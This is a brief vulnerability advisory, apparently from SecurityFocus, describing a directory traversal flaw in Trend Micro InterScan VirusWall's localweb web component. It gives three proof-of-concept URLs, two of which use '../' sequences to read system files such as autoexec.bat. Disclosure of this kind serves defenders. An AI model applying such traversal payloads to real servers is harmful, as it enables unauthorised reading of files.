Trend Micro Interscan Viruswall localweb Directory Traversal Vulnerability

No exploit is required.

The following proof of concept has been provided:
http://www.example.com/ishttpd/localweb/filename
http://www.example.com/ishttpd/localweb/java/?/../../../../../../../../autoexec.bat
http://www.example.com/ishttpd/localweb/java/?/../../../ishttpd.exe


 

Privacy Statement
Copyright 2010, SecurityFocus